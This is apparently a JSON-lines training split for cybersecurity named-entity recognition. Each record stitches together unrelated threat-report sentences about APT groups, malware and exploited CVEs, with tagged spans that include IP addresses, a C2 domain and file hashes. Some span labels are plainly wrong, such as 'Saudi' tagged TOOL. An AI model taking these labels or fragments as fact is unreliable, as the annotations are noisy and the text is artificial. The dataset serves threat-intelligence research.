"info": {"id": "cyberner_stix_train_005330", "source": "cyberner_stix_train"}} {"text": "This organization is also working on interception technology . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points . Every IXESHE case we examined revealed that the original infection vector was a targeted email with a PDF exploit as attachment . 
Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"TOOL: Creators Update": [[97, 112]], "ORGANIZATION: Windows Defender ATP": [[115, 135]], "THREAT_ACTOR: IXESHE": [[374, 380]], "TOOL: email": [[457, 462]], "TOOL: PDF": [[470, 473]], "SYSTEM: Compromised websites": [[498, 518]], "ORGANIZATION: WordPress": [[521, 530]]}, "info": {"id": "cyberner_stix_train_005331", "source": "cyberner_stix_train"}} {"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast executable) and a malicious DLL wsc.dll” in the %TEMP% folder .", "spans": {"MALWARE: Sea Turtle": [[67, 77]], "FILEPATH: wsc_proxy.exe”": [[197, 211]], "TOOL: DLL": [[258, 261]], "FILEPATH: wsc.dll”": [[262, 270]]}, "info": {"id": "cyberner_stix_train_005332", "source": "cyberner_stix_train"}} {"text": "The report specifies the Magic Hound targeted political , military and defense industry in the US , UK and Israel . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon .", "spans": {"ORGANIZATION: political , military and defense industry": [[46, 87]], "FILEPATH: KerrDown": [[149, 157]]}, "info": {"id": "cyberner_stix_train_005333", "source": "cyberner_stix_train"}} {"text": "The dark ways of the Triada Once downloaded and installed , the Triada Trojan first tries to collect some information about the system — like the device model , the OS version , the amount of the SD card space , the list of the installed applications and other things . 
Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . Over the course of the attack campaign , we have observed two different variations of the Helminth backdoor , one written in VBScript and PowerShell that was delivered via a macro within Excel spreadsheets and the other a standalone Windows executable .", "spans": {"MALWARE: Triada": [[21, 27], [64, 70]], "VULNERABILITY: 0-day": [[381, 386]], "VULNERABILITY: Adobe Flash Player exploit": [[389, 415]], "MALWARE: Helminth backdoor": [[508, 525]], "TOOL: PowerShell": [[556, 566]]}, "info": {"id": "cyberner_stix_train_005334", "source": "cyberner_stix_train"}} {"text": "FinFisher is not afraid of using all kinds of tricks , ranging from junk instructions and “ spaghetti code ” to multiple layers of virtual machines and several known and lesser-known anti-debug and defensive measures . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years . This simple backdoor has only four commands that can be used by the attacker : In the listed indicators of compromise , we noticed domains that we had seen used in a distinct skimming campaign which did n't seem to be documented yet .", "spans": {"MALWARE: FinFisher": [[0, 9]], "THREAT_ACTOR: group": [[223, 228]], "VULNERABILITY: CVE-2012-0158": [[278, 291]]}, "info": {"id": "cyberner_stix_train_005335", "source": "cyberner_stix_train"}} {"text": "sepolicy-inject_arm 2019-01-08 04:55:00 47449a612697ad99a6fbd6e02a84e957557371151f2b034a411ebb10496648c8 sepolicy-inject_arm64 2019-01-08 04:55:00 824ad333320cbb7873dc49e61c14f749b0e0d88723635524463f2e6f56ea133a sepolicy-inject_i686 2019-01-08 04:55:00 13ec6cec511297ac3137cf7d6e4a7c4f5dd2b24478a06262a44f13a3d61070b6 In August 2018 , Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER . 
However , the attacker can easily create new accounts and update the malicious files in order to still work . LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"ORGANIZATION: Unit 42": [[335, 342]], "THREAT_ACTOR: OilRig": [[352, 358]], "ORGANIZATION: government organization": [[371, 394]], "TOOL: BONDUPDATER": [[474, 485]], "TOOL: LIGHTWORK": [[598, 607]]}, "info": {"id": "cyberner_stix_train_005336", "source": "cyberner_stix_train"}} {"text": "This method is design to bypass the automatic Google Play protection mechanism called Bouncer . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": {"SYSTEM: Google Play": [[46, 57]], "SYSTEM: Bouncer": [[86, 93]], "TOOL: PingCastle MS17-010": [[167, 186]], "VULNERABILITY: EternalBlue": [[314, 325]], "MALWARE: XtremeRAT": [[428, 437]], "THREAT_ACTOR: attackers": [[485, 494]]}, "info": {"id": "cyberner_stix_train_005337", "source": "cyberner_stix_train"}} {"text": "Following a network compromise , the threat actors typically delete their tools and processes .", "spans": {}, "info": {"id": "cyberner_stix_train_005338", "source": "cyberner_stix_train"}} {"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This DLL is stored in the launcher’s resources and compressed with LZMA . Does your organization support the U.S. Military An example would be supply chain management or manufacturing of parts that could be used by the military WarDefense", "spans": {"MALWARE: Gustuff": [[25, 32]], "ORGANIZATION: Cisco Talos": [[84, 95]], "SYSTEM: Android-based": [[116, 129]], "TOOL: PIVY": [[185, 189], [451, 455]], "ORGANIZATION: chemical makers": [[263, 278]], "ORGANIZATION: government agencies": [[281, 300]], "ORGANIZATION: defense contractors": [[303, 322]], "THREAT_ACTOR: attackers": [[393, 402]], "VULNERABILITY: zero-day vulnerability": [[410, 432]], "TOOL: DLL": [[471, 474]], "TOOL: LZMA": [[533, 537]], "ORGANIZATION: supply chain management": [[609, 632]], "ORGANIZATION: manufacturing": [[636, 649]], "ORGANIZATION: military WarDefense": [[685, 704]]}, "info": {"id": "cyberner_stix_train_005339", "source": "cyberner_stix_train"}} {"text": "Package Name SHA256 digest SHA1 certificate com.network.android 98ca5f94638768e7b58889bb5df4584bf5b6af56b188da48c10a02648791b30c 516f8f516cc0fd8db53785a48c0a86554f75c3ba com.network.android 5353212b70aa096d918e4eb6b49eb5ad8f59d9bec02d089e88802c01e707c3a1 Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research . Winnti : bugcheck.xigncodeservice.com 167.99.106.49 , 178.128.180.206 DigitalOcean . 
In September , the Department of the Treasury issued an advisory strongly discouraging consumers and organizations from making payments based on extortion attempts and encouraging them to strengthen their defense measures .", "spans": {"THREAT_ACTOR: APT40": [[269, 274]], "ORGANIZATION: universities": [[339, 351]], "THREAT_ACTOR: Winnti": [[380, 386]], "DOMAIN: bugcheck.xigncodeservice.com": [[389, 417]], "IP_ADDRESS: 167.99.106.49": [[418, 431]], "IP_ADDRESS: 178.128.180.206": [[434, 449]], "ORGANIZATION: DigitalOcean": [[450, 462]], "ORGANIZATION: Department of the Treasury": [[484, 510]]}, "info": {"id": "cyberner_stix_train_005340", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //mailsa-wqq [ . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . With regard to detection, several methods can be used to identify this type of C2 . 
During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"THREAT_ACTOR: espionage group": [[34, 49]], "ORGANIZATION: Department of Homeland Security": [[80, 111]], "ORGANIZATION: DHS": [[114, 117]], "ORGANIZATION: FBI": [[162, 165]], "ORGANIZATION: military": [[309, 317]], "ORGANIZATION: government": [[322, 332]], "TOOL: C2": [[450, 452]], "THREAT_ACTOR: Winnti group": [[492, 504]], "MALWARE: previously unreported malware samples": [[522, 559]], "MALWARE: malware arsenal": [[605, 620]], "SYSTEM: registered domains": [[636, 654]]}, "info": {"id": "cyberner_stix_train_005341", "source": "cyberner_stix_train"}} {"text": "Trend Micro researchers found a new variant that uses a different way to lure users . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test5.hta 80.82.67.42 . 
Would you click on the links in the email , even if it came from an address you did nt recognize If you have old vacation pictures on Facebook , a determined hacker could use them to write such an email , and cyber criminals are starting to use that kind of information to craft targets specifically for their victims .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "ORGANIZATION: FireEye": [[99, 106]], "THREAT_ACTOR: attackers": [[113, 122]], "VULNERABILITY: Microsoft Office vulnerabilities": [[190, 222]], "TOOL: LOWBALL": [[273, 280]], "FILEPATH: test5.hta": [[283, 292]], "IP_ADDRESS: 80.82.67.42": [[293, 304]], "THREAT_ACTOR: cyber criminals": [[516, 531]]}, "info": {"id": "cyberner_stix_train_005342", "source": "cyberner_stix_train"}} {"text": "Dvmap : the first Android malware with code injection 08 JUN 2017 In April 2017 we started observing new rooting malware being distributed through the Google Play Store . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . The attached file , Reserva Advogados Associados.docx ( Attorneys Associates Reservation.docx ) , is a malicious Word file that drops a remote OLE object via template injection to execute macro code . 
Though few details are currently available about CVE-2023 - 37450 , Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content .", "spans": {"MALWARE: Dvmap": [[0, 5]], "SYSTEM: Android": [[18, 25]], "SYSTEM: Google Play Store": [[151, 168]], "VULNERABILITY: Niteris exploit": [[216, 231]], "ORGANIZATION: banks": [[274, 279]], "FILEPATH: Reserva Advogados Associados.docx": [[406, 439]], "FILEPATH: Attorneys Associates Reservation.docx": [[442, 479]], "TOOL: OLE": [[529, 532]], "VULNERABILITY: CVE-2023 - 37450": [[636, 652]]}, "info": {"id": "cyberner_stix_train_005343", "source": "cyberner_stix_train"}} {"text": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute ’s self-described mission and other public information .", "spans": {"ORGANIZATION: CNIIHM": [[14, 20]], "MALWARE: TRITON": [[98, 104]]}, "info": {"id": "cyberner_stix_train_005345", "source": "cyberner_stix_train"}} {"text": "In this example , the server response contains several values for Thai carriers . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call . 
Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": {"ORGANIZATION: Kaspersky Lab": [[110, 123]], "MALWARE: ZxShell": [[308, 315]], "MALWARE: Ransomware builders": [[471, 490]]}, "info": {"id": "cyberner_stix_train_005346", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 208.115.242.38 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 208.115.242.38": [[10, 24]]}, "info": {"id": "cyberner_stix_train_005347", "source": "cyberner_stix_train"}} {"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . this SWC was used to specifically target Turkish goverment .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]]}, "info": {"id": "cyberner_stix_train_005348", "source": "cyberner_stix_train"}} {"text": ") The RCSAndroid code can be considered one of the most professionally developed and sophisticated Android malware ever exposed . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan . For brevity I will quickly cover some key points to understand the algorithm at a high level . When the victim opened an archive , a second stage dropper executed and a WAV file played like a real voicemail .", "spans": {"MALWARE: RCSAndroid": [[6, 16]], "SYSTEM: Android": [[99, 106]], "THREAT_ACTOR: BRONZE BUTLER": [[130, 143]], "THREAT_ACTOR: cyberespionage": [[181, 195]]}, "info": {"id": "cyberner_stix_train_005349", "source": "cyberner_stix_train"}} {"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence . 
Specifically , it looks for antivirus and other security products . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"TOOL: TRITON": [[123, 129]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[180, 213]], "THREAT_ACTOR: Dukes": [[303, 308]]}, "info": {"id": "cyberner_stix_train_005350", "source": "cyberner_stix_train"}} {"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton.com email account .", "spans": {"THREAT_ACTOR: TG-4127": [[20, 27]], "DOMAIN: hillaryclinton.com": [[122, 140]], "TOOL: email": [[141, 146]]}, "info": {"id": "cyberner_stix_train_005351", "source": "cyberner_stix_train"}} {"text": "This most recent FakeSpy campaign appears to target users of postal services around the world . Over the past three months , Recorded Future’s Insikt Group has observed an increase in APT33’s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": {"MALWARE: FakeSpy": [[17, 24]], "ORGANIZATION: Recorded Future’s": [[125, 142]], "THREAT_ACTOR: APT33’s": [[184, 191]], "THREAT_ACTOR: Elfin": [[206, 211]], "ORGANIZATION: Palo Alto Networks": [[323, 341]], "ORGANIZATION: WildFire": [[355, 363]]}, "info": {"id": "cyberner_stix_train_005352", "source": "cyberner_stix_train"}} {"text": "the C : path , save it to the file in json format and zip it nggstart_screen nggstop_screen Enable/disable screenshot module . 
The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has been active since at least 2008 and has targeted the restaurant , gaming , and hotel industries .", "spans": {"TOOL: SDK": [[131, 134]], "MALWARE: SWAnalytics": [[143, 154]], "ORGANIZATION: Tencent MyApp": [[270, 283]], "ORGANIZATION: Wandoujia": [[286, 295]], "ORGANIZATION: Huawei App Store": [[298, 314]], "ORGANIZATION: Xiaomi App Store": [[321, 337]]}, "info": {"id": "cyberner_stix_train_005353", "source": "cyberner_stix_train"}} {"text": "Standard Encryption Frequently , Bread apps take advantage of standard crypto libraries in ` java.util.crypto ` . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities . Execute Run a program in the remote host . The actor hunts for confidential information stored in the networks of governmental organizations , political groups and think tanks , as well as various individuals involved in defense and geopolitical related research .", "spans": {"TOOL: CVE software vulnerabilities": [[293, 321]], "THREAT_ACTOR: The actor": [[367, 376]], "ORGANIZATION: governmental organizations": [[438, 464]], "ORGANIZATION: political groups": [[467, 483]], "ORGANIZATION: think tanks": [[488, 499]], "ORGANIZATION: various individuals involved in defense and geopolitical related research": [[513, 586]]}, "info": {"id": "cyberner_stix_train_005354", "source": "cyberner_stix_train"}} {"text": "They represent features and can be turned on and off from the command-and-control ( C & C ) server or by an SMS message , effectively instructing the malware to execute certain tasks . 
Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . HELIX KITTEN is likely an Iranian-based adversary group , active since at least late 2015 , targeting organizations in the aerospace , energy , financial , government , hospitality and telecommunications business verticals .", "spans": {"MALWARE: Ploutus-D": [[185, 194]], "THREAT_ACTOR: HELIX KITTEN": [[363, 375]], "ORGANIZATION: aerospace": [[486, 495]], "ORGANIZATION: energy": [[498, 504]], "ORGANIZATION: financial": [[507, 516]], "ORGANIZATION: government": [[519, 529]], "ORGANIZATION: hospitality": [[532, 543]], "ORGANIZATION: telecommunications business": [[548, 575]]}, "info": {"id": "cyberner_stix_train_005355", "source": "cyberner_stix_train"}} {"text": "As shown within the timeline above , the WINDSHIFT activity observed by Unit 42 falls between January and May of 2018 . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"ORGANIZATION: Unit 42": [[72, 79]], "TOOL: emails": [[148, 154]], "TOOL: Flash": [[160, 165], [252, 257]], "MALWARE: Daserf": [[212, 218]], "MALWARE: malware": [[219, 226]], "VULNERABILITY: exploits": [[258, 266]]}, "info": {"id": "cyberner_stix_train_005356", "source": "cyberner_stix_train"}} {"text": "These files were most likely delivered via spear phishing emails to lure employees into unwittingly launching the malicious payload .", "spans": {"TOOL: emails": [[58, 64]]}, "info": {"id": "cyberner_stix_train_005357", "source": "cyberner_stix_train"}} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . 
The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"MALWARE: Silence.Main Trojan": [[4, 23]], "MALWARE: Clayslide": [[153, 162]], "FILEPATH: OfficeServicesStatus.vbs file": [[182, 211]], "MALWARE: ISMAgent Clayslide document": [[225, 252]]}, "info": {"id": "cyberner_stix_train_005358", "source": "cyberner_stix_train"}} {"text": "The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges .", "spans": {"TOOL: Wi-Fi networks": [[42, 56]], "THREAT_ACTOR: NetBIOS Name Service": [[84, 104]]}, "info": {"id": "cyberner_stix_train_005359", "source": "cyberner_stix_train"}} {"text": "http : //www.himobilephone [ . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . Seedworm then uses open-source tools such as LaZagne and Crackmapexec to obtain Windows authorization credentials .", "spans": {"ORGANIZATION: Secureworks": [[70, 81]], "THREAT_ACTOR: BRONZE BUTLER": [[113, 126]], "VULNERABILITY: CVE-2016-7836": [[193, 206]], "THREAT_ACTOR: Seedworm": [[293, 301]], "MALWARE: LaZagne": [[338, 345]], "MALWARE: Crackmapexec": [[350, 362]], "SYSTEM: Windows": [[373, 380]]}, "info": {"id": "cyberner_stix_train_005360", "source": "cyberner_stix_train"}} {"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC . 
An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) . In addition to Denes and Remy backdoors , at least two different communication modules were observed with different versions of this launcher – DNSProvider and HTTPProv . The ThreatConnect Platform also offers workflows and lowcode automation to automate the analysis and response process of reported emails .", "spans": {"THREAT_ACTOR: hacking group": [[122, 135]], "THREAT_ACTOR: Ajax Security": [[151, 164]], "THREAT_ACTOR: Flying Kitten": [[180, 193]], "ORGANIZATION: CrowdStrike": [[199, 210]], "ORGANIZATION: dissidents": [[265, 275]], "MALWARE: Denes": [[358, 363]], "MALWARE: Remy backdoors": [[368, 382]], "TOOL: DNSProvider": [[487, 498]], "TOOL: HTTPProv": [[503, 511]], "TOOL: ThreatConnect Platform": [[518, 540]]}, "info": {"id": "cyberner_stix_train_005361", "source": "cyberner_stix_train"}} {"text": "The C2 S-TOOL server responds using the same format and serialization/encryption/encoding .", "spans": {"TOOL: C2 S-TOOL server": [[4, 20]]}, "info": {"id": "cyberner_stix_train_005362", "source": "cyberner_stix_train"}} {"text": "This malware is responsible for decrypting the WFC.cfg file in the same folder with a hardcoded 20-byte XOR key .", "spans": {"FILEPATH: WFC.cfg": [[47, 54]]}, "info": {"id": "cyberner_stix_train_005363", "source": "cyberner_stix_train"}} {"text": "US intelligence agencies pinned the breach on North Korea ( one of the hacking group 's demands was that Sony pull The Interview , Seth Rogan 's comedy about a plot to assassinate Kim Jong-Un ) . 
The spear-phishing infection vector is still the most popular ACT to initiate targeted campaigns .", "spans": {"ORGANIZATION: intelligence agencies": [[3, 24]], "ORGANIZATION: Sony": [[105, 109]]}, "info": {"id": "cyberner_stix_train_005364", "source": "cyberner_stix_train"}} {"text": "Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments .", "spans": {"MALWARE: Zebrocy": [[0, 7]], "ORGANIZATION: Microsoft": [[75, 84]], "ORGANIZATION: Office": [[85, 91]]}, "info": {"id": "cyberner_stix_train_005365", "source": "cyberner_stix_train"}} {"text": "This report details some of the technical findings of the Lazarus Group’s malware , observed by Novetta during Operation Blockbuster . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": {"THREAT_ACTOR: Lazarus": [[58, 65]], "ORGANIZATION: Novetta": [[96, 103]], "ORGANIZATION: Operation Blockbuster": [[111, 132]], "ORGANIZATION: Group-IB": [[145, 153]], "TOOL: PowerShell": [[194, 204]], "FILEPATH: Ivoke": [[219, 224]]}, "info": {"id": "cyberner_stix_train_005366", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) . The use of the Mia Ash persona demonstrates the creativity and persistence that threat actors employ to compromise targets . If the names differ , the malware will simply exit without touching the payload . If you receive such an email , just delete it and do n’t give it a second thought .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20]], "TOOL: Mia Ash": [[134, 141]], "THREAT_ACTOR: threat actors": [[199, 212]]}, "info": {"id": "cyberner_stix_train_005367", "source": "cyberner_stix_train"}} {"text": "The malware uses the function sendAll to send messages that spread the malware to other devices . 
We also observed Emissary Panda uploading legitimate tools that would sideload DLLs , specifically the Sublime Text plugin host and the Microsoft’s Create Media application , both of which we had never seen used for DLL sideloading before . In this report , we present the historical intelligence we have gathered on the Ke3chang campaign , as well as an in-depth assessment of the ongoing Syrian-themed attacks against these MFAs .", "spans": {"THREAT_ACTOR: Emissary Panda": [[115, 129]]}, "info": {"id": "cyberner_stix_train_005368", "source": "cyberner_stix_train"}} {"text": "By using access to additional computers through the currently logged on user or cracked passwords through dumped hashes , the attackers then began traversing the network infecting additional computers .", "spans": {}, "info": {"id": "cyberner_stix_train_005369", "source": "cyberner_stix_train"}} {"text": "The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy .", "spans": {"ORGANIZATION: Sogu": [[4, 8]], "FILEPATH: Backdoor.Sogu": [[46, 59]], "MALWARE: Poison Ivy": [[137, 147]]}, "info": {"id": "cyberner_stix_train_005370", "source": "cyberner_stix_train"}} {"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[162, 168]], "TOOL: emails": [[294, 300]], "ORGANIZATION: government officials": [[315, 335]], "FILEPATH: malicious Microsoft Word document": [[377, 410]], "VULNERABILITY: CVE-2012-0158": [[430, 443]]}, "info": {"id": "cyberner_stix_train_005371", "source": "cyberner_stix_train"}} {"text": "] ponethus [ . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy . As long as these actors regularly achieve their objective ( stealing sensitive data ) , they are not motivated to update or rethink their techniques , tactics , or procedures ( TTPs ) . Malwarebytes 's EDR shows the full attack chain ( please click to enlarge ): The NetSupport RAT files are hosted on the same compromised WordPress site used earlier to download the Internet shortcut .", "spans": {"TOOL: email lures": [[57, 68]], "TOOL: KeyBoy": [[146, 152]], "ORGANIZATION: Malwarebytes 's EDR": [[341, 360]], "MALWARE: NetSupport RAT": [[422, 436]]}, "info": {"id": "cyberner_stix_train_005372", "source": "cyberner_stix_train"}} {"text": "The first known Suckfly campaign began in April of 2014 .", "spans": {"THREAT_ACTOR: Suckfly": [[16, 23]]}, "info": {"id": "cyberner_stix_train_005373", "source": "cyberner_stix_train"}} {"text": "Critically however , the first sample of the OnionDuke dropper , which we have observed being used only with components of this toolset , was compiled on the 17th of February 2013 .", "spans": {"MALWARE: OnionDuke": [[45, 54]]}, "info": {"id": "cyberner_stix_train_005374", "source": "cyberner_stix_train"}} {"text": "In another instance , APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there , suggesting the 
group was tasked to reconnoiter the facility for security reasons . The documents that exploit CVE-2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "VULNERABILITY: exploit": [[212, 219]], "VULNERABILITY: CVE-2017-11882": [[220, 234]], "TOOL: HTML Application": [[265, 281]], "TOOL: HTA": [[284, 287]], "TOOL: Visual Basic": [[314, 326]], "TOOL: VBS": [[329, 332]], "FILEPATH: mshta.exe": [[417, 426]]}, "info": {"id": "cyberner_stix_train_005375", "source": "cyberner_stix_train"}} {"text": "The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems .", "spans": {"MALWARE: Shamoon": [[138, 145]], "TOOL: Saudi": [[149, 154]]}, "info": {"id": "cyberner_stix_train_005376", "source": "cyberner_stix_train"}} {"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications . We observed the attacker targeting both Windows and Mac OS X in the same spam mail on June 9 , 2017 .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: financial": [[91, 100]], "ORGANIZATION: government": [[103, 113]], "ORGANIZATION: energy": [[116, 122]], "ORGANIZATION: chemical": [[125, 133]], "ORGANIZATION: telecommunications": [[140, 158]], "SYSTEM: Windows": [[201, 208]], "SYSTEM: Mac OS X": [[213, 221]]}, "info": {"id": "cyberner_stix_train_005377", "source": "cyberner_stix_train"}} {"text": "HawkEye is a versatile Trojan used by diverse actors for multiple purposes . 
We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": {"TOOL: HawkEye": [[0, 7]], "THREAT_ACTOR: actors": [[46, 52]], "THREAT_ACTOR: operators": [[113, 122]], "THREAT_ACTOR: APT28": [[130, 135]], "ORGANIZATION: citizens": [[163, 171], [175, 183]]}, "info": {"id": "cyberner_stix_train_005378", "source": "cyberner_stix_train"}} {"text": "Traps blocks the Sofacy delivery documents and the SofacyCarberp payload .", "spans": {"THREAT_ACTOR: Sofacy": [[17, 23]], "MALWARE: SofacyCarberp": [[51, 64]]}, "info": {"id": "cyberner_stix_train_005379", "source": "cyberner_stix_train"}} {"text": "The configuration file is loaded from the same directory as the module and is expected to have a name “ NvCpld.dat “ .", "spans": {"FILEPATH: NvCpld.dat": [[104, 114]]}, "info": {"id": "cyberner_stix_train_005380", "source": "cyberner_stix_train"}} {"text": "6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a .", "spans": {"FILEPATH: 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a": [[0, 64]]}, "info": {"id": "cyberner_stix_train_005381", "source": "cyberner_stix_train"}} {"text": "In this case , FrozenCell has primarily netted the actors behind it with recorded outbound calls followed closely by images and recorded incoming calls . The malicious samples we found are the early stage malware most often delivered by spear-phishing e-mails . APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points . 
Though Google meant to have this parameter be used to mention the page the user visited , we used it to exfiltrate the user name and password data encoded in base64 .", "spans": {"MALWARE: FrozenCell": [[15, 25]], "THREAT_ACTOR: APT1": [[262, 266]], "TOOL: FQDNs": [[291, 296]], "ORGANIZATION: Google": [[378, 384]]}, "info": {"id": "cyberner_stix_train_005382", "source": "cyberner_stix_train"}} {"text": "We look at how these activity groups introduce the implant to various targets and techniques used by Microsoft researchers to track the implant .", "spans": {"ORGANIZATION: Microsoft": [[101, 110]]}, "info": {"id": "cyberner_stix_train_005383", "source": "cyberner_stix_train"}} {"text": "changeActivity : This command will set up the webview to overlay any of the target activities . Analysts in our DeepSight Managed Adversary and Threat Intelligence ( MATI ) team have found a new backdoor , Backdoor.Powemuddy , new variants of Seedworm 's Powermud backdoor ( aka POWERSTATS ) , a GitHub repository used by the group to store their scripts , as well as several post-compromise tools the group uses to exploit victims once they have established a foothold in their network . KHRAT : Compile Date and Time : 2018-05-02 05:22:23 PM . 
